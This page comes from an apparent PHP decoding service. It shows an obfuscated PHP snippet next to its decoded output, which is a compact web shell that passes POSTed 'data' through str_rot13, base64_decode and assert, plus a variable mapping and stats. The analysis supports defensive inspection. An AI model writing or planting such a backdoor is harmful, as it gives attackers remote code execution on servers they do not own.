Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $qisi="\x61"."\x73"."s".chr(101)."r"."\x74";$voec=chr(98)."\x61".chr(115).chr(10..

Decoded Output download

<?php  
 
$qisi="a"."s"."s".chr(101)."r"."t";$voec=chr(98)."a".chr(115).chr(101).chr(54)."4"."_".chr(100)."e"."c"."o"."d"."e";$msna=chr(115).chr(116)."r"."_".chr(114).chr(111).chr(116).chr(49).chr(51);@$qisi(@$voec(@$msna($_POST["d"."a"."t"."a"])));die(); 
 ?>

Did this file decode correctly?

Original Code

<?php 

$qisi="\x61"."\x73"."s".chr(101)."r"."\x74";$voec=chr(98)."\x61".chr(115).chr(101).chr(54)."4"."_".chr(100)."\x65"."c"."\x6f"."d"."e";$msna=chr(115).chr(116)."r"."_".chr(114).chr(111).chr(116).chr(49).chr(51);@$qisi(@$voec(@$msna($_POST["d"."\x61"."t"."\x61"])));die();

Function Calls

chr 13
str_rot13 1

Variables

$msna str_rot13
$qisi assert
$voec base64_decode

Stats

MD5 c0779bd0908c7252a501f8e50a8575d8
Eval Count 0
Decode Time 130 ms